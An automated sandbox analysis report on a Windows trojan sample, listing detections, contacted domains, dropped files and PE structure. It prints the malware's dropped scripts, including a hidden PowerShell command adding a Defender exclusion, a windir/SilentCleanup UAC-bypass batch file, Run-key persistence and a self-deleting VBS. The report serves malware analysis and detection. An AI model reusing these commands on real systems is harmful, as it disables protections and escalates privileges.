              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              [Behavior graph: ID 488339, Sample g4E1F7Lc2O, Start date 22/09/2021, Architecture WINDOWS, Score 100]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              g4E1F7Lc2O.exe | 20% | ReversingLabs | Win32.Trojan.Generic
              g4E1F7Lc2O.exe | 100% | Joe Sandbox ML |

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe | 100% | Joe Sandbox ML |
              C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe | 20% | ReversingLabs | Win32.Trojan.Generic

              Unpacked PE Files

              Source | Detection | Scanner | Label
              7.0.logagent.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              20.2.logagent.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
              29.2.DpiScaling.exe.10590000.2.unpack | 100% | Avira | TR/Dropper.Gen
              7.0.logagent.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              19.2.logagent.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
              29.0.DpiScaling.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              29.0.DpiScaling.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              29.0.DpiScaling.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              7.0.logagent.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              7.2.logagent.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
              29.0.DpiScaling.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              29.2.DpiScaling.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
              7.2.logagent.exe.10590000.2.unpack | 100% | Avira | TR/Dropper.Gen
              7.0.logagent.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              trapboijiggy.dvrlists.com | 0% | Avira URL Cloud | safe
              http://www.imvu.comr | 0% | URL Reputation | safe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
              http://www.ebuddy.com | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              trapboijiggy.dvrlists.com | 31.3.152.100 | true | false | | high
              sn-files.ha.1drv.com | 40.79.207.82 | true | false | | high
              qclcfg.sn.files.1drv.com | unknown | unknown | false | | high
              onedrive.live.com | unknown | unknown | false | | high

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                        trapboijiggy.dvrlists.com | true | Avira URL Cloud: safe | unknown

                                  URLs from Memory and Binaries

                                  Name | Source | Malicious | Antivirus Detection | Reputation
                                  https://www.google.com | logagent.exe | false | | high
                                  http://www.imvu.comr | logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
                                  http://www.imvu.com | logagent.exe | false | | high
                                  http://www.nirsoft.net/ | logagent.exe, logagent.exe, 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp | false | | high
                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                                  http://www.ebuddy.com | logagent.exe | false | URL Reputation: safe | unknown

                                        Contacted IPs

                                        Public

                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        40.79.207.82 | sn-files.ha.1drv.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                        40.79.207.80 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                        31.3.152.100 | trapboijiggy.dvrlists.com | Sweden | 51430 | ALTUSNL | false

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:488339
                                        Start date:22.09.2021
                                        Start time:20:58:23
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 22s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:g4E1F7Lc2O (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.phis.troj.spyw.evad.winEXE@29/10@15/4
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 9.3% (good quality ratio 8.3%)
                                        • Quality average: 72%
                                        • Quality standard deviation: 33%
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 136
                                        • Number of non-executed functions: 350
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.179.121.14, 20.82.210.154, 8.253.95.120, 8.248.113.254, 8.248.131.254, 8.248.143.254, 8.253.95.121, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 52.242.16.171, 20.82.209.183
                                        • Excluded domains from analysis (whitelisted): eastus0-odwebpl.cloudapp.net, odc-web-brs.onedrive.akadns.net, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, canadaeast1-odwebpl.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, odwebpl.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • Not all processes were analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/488339/sample/g4E1F7Lc2O.exe

                                        Simulations

                                        Behavior and APIs

                                        Time | Type | Description
                                        20:59:38 | API Interceptor | 2x Sleep call for process: g4E1F7Lc2O.exe modified
                                        20:59:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bkmhwql C:\Users\Public\Libraries\lqwhmkB.url
                                        20:59:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bkmhwql C:\Users\Public\Libraries\lqwhmkB.url
                                        21:00:40 | API Interceptor | 3x Sleep call for process: Bkmhwql.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\Public\KDECO.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):155
                                        Entropy (8bit):4.687076340713226
                                        Encrypted:false
                                        SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                        MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                        SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                        SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                        SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                        C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1017856
                                        Entropy (8bit):6.208736062525416
                                        Encrypted:false
                                        SSDEEP:12288:FYfGUHuv5bSkBsFkT5m3GpOAz1yeoAdrL7i:FYOUUtBs2YqO8PrPi
                                        MD5:7274D6C1A7DC0A091E1A801165F879CD
                                        SHA1:CC686677E1E22B71EF2B18559ADB4C16AEF11756
                                        SHA-256:3B5A4B0FE5B8F4FD9BF24F32712E69DA23B412A5653E0042D23A1D2429C42379
                                        SHA-512:4EF480116B4C068E7A45A0E1E9A7B2F94AA3AF52FA1788572D53C868DF312FB90571A3140CCCA611E965D5EACE88F33CB71F458216E77B61D4D6119C5A7F9C32
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 20%
                                        Reputation:unknown
                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................x.............@..............................................@..............................x#.......R...................0...g........................... ......................................................CODE................................ ..`DATA....x...........................@...BSS.....m................................idata..x#.......$..................@....tls.....................................rdata....... ......................@..P.reloc...g...0...h..................@..P.rsrc....R.......R...6..............@..P....................................@..P........................................................................................................................................
                                        C:\Users\Public\Libraries\lqwhmkB.url
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Bkmhwql\\Bkmhwql.exe">), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):96
                                        Entropy (8bit):4.9458141003431235
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMaINSUJ5dAUJLABvsGKd6ov:HRYFVmTWDyzSNn/IvsbDv
                                        MD5:4A24E88CD25DDCF0C53A4C4209517752
                                        SHA1:221EAFE6B644E1D5D957902A1ED5CF16E092BA4E
                                        SHA-256:B984865B9EEA9B8245C0070802C59C4EF1A58A662F6759E7143D836D803134AA
                                        SHA-512:F1589EEEE32ABED6D85DA97C32599FBE0B921EE5CC83A6AF45C5ED099539E71292F9B67B16A6C228948927AFF51F3D95E351A0EDEF705D4FBC9FABB0FEAE9947
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\lqwhmkB.url, Author: @itsreallynick (Nick Carr)
                                        Reputation:unknown
                                        Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Bkmhwql\\Bkmhwql.exe"..IconIndex=2..
                                        C:\Users\Public\Trast.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):34
                                        Entropy (8bit):4.314972767530033
                                        Encrypted:false
                                        SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                        MD5:4068C9F69FCD8A171C67F81D4A952A54
                                        SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                        SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                        SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: start /min C:\Users\Public\UKO.bat
                                        C:\Users\Public\UKO.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):250
                                        Entropy (8bit):4.865356627324657
                                        Encrypted:false
                                        SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                        MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                        SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                        SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                        SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                        C:\Users\Public\nest
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):9
                                        Entropy (8bit):3.169925001442312
                                        Encrypted:false
                                        SSDEEP:3:nNJov:Nmv
                                        MD5:032DB08F486917D01F3869C5B67C6C38
                                        SHA1:D1FCF45F4ABC395BED4A7ABD95438CF35E4AB90E
                                        SHA-256:2B5BE716C81384A5C1DAA9B7A6D4878143222BEABF6E6A2B04BCAAEF2973B3A8
                                        SHA-512:FEF4DFE3F4C20757E3C0C3B4889FECBFC96722585A6AFEB16D85E33DBF1A981A98AFF60E198D935A374A7586235F858496843460A3DE4A1D7EAF882E278B0F31
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: Bkmhwql..
                                        C:\Users\Public\nest.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):53
                                        Entropy (8bit):4.263285494083192
                                        Encrypted:false
                                        SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                                        MD5:8ADA51400B7915DE2124BAAF75E3414C
                                        SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                                        SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                                        SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: start /min reg delete hkcu\Environment /v windir /f..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Bkmhwqlbkulnphubkhqeoycsyqhknoi[1]
                                        Process:C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):844288
                                        Entropy (8bit):7.998426730460836
                                        Encrypted:true
                                        SSDEEP:24576:hZIo+tjug7M1NwuOhqO9RUZ5ut74t8Ld/xUjdqJpF:hZIo+tjug7M1eugqO9RTestxUj0J
                                        MD5:8B287963C8023A2FBF765048DA4FDA16
                                        SHA1:1D4BC83D913A33C424AB30D10F7C90C74EA10289
                                        SHA-256:BB377D3942595C09A1C0361982E9C3C582B8CEDA08378CA8BFDF6B500653EFD7
                                        SHA-512:98B5DCBF78C42A9263C13A68A06F61AACB7C61239D5D479B614BAAB5D3EE329029CB90F697AA2AE679CE1D3009FB6FE6A13919ADED654414AB030F97B19CACC9
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Bkmhwqlbkulnphubkhqeoycsyqhknoi[1]
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):844288
                                        Entropy (8bit):7.998426730460836
                                        Encrypted:true
                                        SSDEEP:24576:hZIo+tjug7M1NwuOhqO9RUZ5ut74t8Ld/xUjdqJpF:hZIo+tjug7M1eugqO9RTestxUj0J
                                        MD5:8B287963C8023A2FBF765048DA4FDA16
                                        SHA1:1D4BC83D913A33C424AB30D10F7C90C74EA10289
                                        SHA-256:BB377D3942595C09A1C0361982E9C3C582B8CEDA08378CA8BFDF6B500653EFD7
                                        SHA-512:98B5DCBF78C42A9263C13A68A06F61AACB7C61239D5D479B614BAAB5D3EE329029CB90F697AA2AE679CE1D3009FB6FE6A13919ADED654414AB030F97B19CACC9
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs
                                        Process:C:\Windows\SysWOW64\logagent.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):448
                                        Entropy (8bit):3.4838450422635763
                                        Encrypted:false
                                        SSDEEP:12:xQ4lA2++ugypjBQMPURc+UN1Q3D9+UN19Hz/0aimi:7a2+SDq+s1QT9+s19Aait
                                        MD5:CDCF542C32AC334F7851871717C5D6C7
                                        SHA1:500CA181C2A9D25EF40B28B11BDE8F6FDAE8F4F8
                                        SHA-256:ADA27D19654FE22B842EA96BE2D2D6FF887EEB43892C0E8C734B24A62CE30F00
                                        SHA-512:0B27049D97AB26BB90912C4A0B490399B0246443B1B969E981E566EBDF366727254C013A0C0A440533D0088848048C660CB3A1AE8CBE8F4B2694BD8BBB6D9A06
                                        Malicious:true
                                        Reputation:unknown
                                        Preview (UTF-16 text, shown decoded):
                                        On Error Resume Next
                                        Set fso = CreateObject("Scripting.FileSystemObject")
                                        while fso.FileExists("C:\Windows\SysWOW64\logagent.exe")
                                        fso.DeleteFile "C:\Windows\SysWOW64\logagent.exe"
                                        wend
                                        fso.DeleteFile(Wscript.ScriptFullName)

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.208736062525416
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.24%
                                        • InstallShield setup (43055/19) 0.43%
                                        • Win32 Executable Delphi generic (14689/80) 0.15%
                                        • Windows Screen Saver (13104/52) 0.13%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                        File name:g4E1F7Lc2O.exe
                                        File size:1017856
                                        MD5:7274d6c1a7dc0a091e1a801165f879cd
                                        SHA1:cc686677e1e22b71ef2b18559adb4c16aef11756
                                        SHA256:3b5a4b0fe5b8f4fd9bf24f32712e69da23b412a5653e0042d23a1d2429c42379
                                        SHA512:4ef480116b4c068e7a45a0e1e9a7b2f94aa3af52fa1788572d53c868df312fb90571a3140ccca611e965d5eace88f33cb71f458216e77b61d4d6119c5a7f9c32
                                        SSDEEP:12288:FYfGUHuv5bSkBsFkT5m3GpOAz1yeoAdrL7i:FYOUUtBs2YqO8PrPi
                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                        File Icon

                                        Icon Hash:8aa2b2b2a2ead4ca

                                        Static PE Info

                                        General

                                        Entrypoint:0x45d078
                                        Entrypoint Section:CODE
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                        DLL Characteristics:
                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:91a12f22e7f2305a107edddf42c40880

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFF0h
                                        mov eax, 0045CE78h
                                        call 00007F3CB8A5B955h
                                        nop
                                        nop
                                        nop
                                        nop
                                        mov eax, dword ptr [004EBEE4h]
                                        mov eax, dword ptr [eax]
                                        call 00007F3CB8AA8A09h
                                        mov ecx, dword ptr [004EC070h]
                                        mov eax, dword ptr [004EBEE4h]
                                        mov eax, dword ptr [eax]
                                        mov edx, dword ptr [0045CAD8h]
                                        call 00007F3CB8AA8A09h
                                        mov eax, dword ptr [004EBEE4h]
                                        mov eax, dword ptr [eax]
                                        call 00007F3CB8AA8A7Dh
                                        call 00007F3CB8A596E0h
                                        lea eax, dword ptr [eax+00h]
                                        add byte ptr [eax], al

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xee000 | 0x2378 | .idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfa000 | 0x5200 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf3000 | 0x67b8 | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xf2000 | 0x18 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        CODE | 0x1000 | 0x5c0c4 | 0x5c200 | False | 0.52856014671 | data | 6.54808365971 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        DATA | 0x5e000 | 0x8e078 | 0x8e200 | False | 0.271541062005 | data | 4.82008212297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        BSS | 0xed000 | 0xe6d | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .idata | 0xee000 | 0x2378 | 0x2400 | False | 0.363932291667 | data | 5.0056698415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .tls | 0xf1000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rdata | 0xf2000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.199107517787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        .reloc | 0xf3000 | 0x67b8 | 0x6800 | False | 0.635967548077 | data | 6.69152272812 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xfa000 | 0x5200 | 0x5200 | False | 0.32831554878 | data | 4.78370739432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_CURSOR | 0xfa774 | 0x134 | data | |
                                        RT_CURSOR | 0xfa8a8 | 0x134 | data | |
                                        RT_CURSOR | 0xfa9dc | 0x134 | data | |
                                        RT_CURSOR | 0xfab10 | 0x134 | data | |
                                        RT_CURSOR | 0xfac44 | 0x134 | data | |
                                        RT_CURSOR | 0xfad78 | 0x134 | data | |
                                        RT_CURSOR | 0xfaeac | 0x134 | data | |
                                        RT_ICON | 0xfafe0 | 0x10a8 | data | English | United States
                                        RT_STRING | 0xfc088 | 0x418 | data | |
                                        RT_STRING | 0xfc4a0 | 0x1d8 | data | |
                                        RT_STRING | 0xfc678 | 0x198 | data | |
                                        RT_STRING | 0xfc810 | 0x174 | data | |
                                        RT_STRING | 0xfc984 | 0x254 | data | |
                                        RT_STRING | 0xfcbd8 | 0xe8 | data | |
                                        RT_STRING | 0xfccc0 | 0x24c | data | |
                                        RT_STRING | 0xfcf0c | 0x3f4 | data | |
                                        RT_STRING | 0xfd300 | 0x378 | data | |
                                        RT_STRING | 0xfd678 | 0x3e8 | data | |
                                        RT_STRING | 0xfda60 | 0x234 | data | |
                                        RT_STRING | 0xfdc94 | 0xec | data | |
                                        RT_STRING | 0xfdd80 | 0x1b4 | data | |
                                        RT_STRING | 0xfdf34 | 0x3e4 | data | |
                                        RT_STRING | 0xfe318 | 0x358 | data | |
                                        RT_STRING | 0xfe670 | 0x2b4 | data | |
                                        RT_RCDATA | 0xfe924 | 0x10 | data | |
                                        RT_RCDATA | 0xfe934 | 0x2a8 | data | |
                                        RT_RCDATA | 0xfebdc | 0x474 | Delphi compiled form 'T__3960965291' | |
                                        RT_GROUP_CURSOR | 0xff050 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_CURSOR | 0xff064 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_CURSOR | 0xff078 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_CURSOR | 0xff08c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_CURSOR | 0xff0a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_CURSOR | 0xff0b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_CURSOR | 0xff0c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                                        RT_GROUP_ICON | 0xff0dc | 0x14 | data | English | United States

                                        Imports

                                        DLL | Import
                                        kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                        user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                        oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                        kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
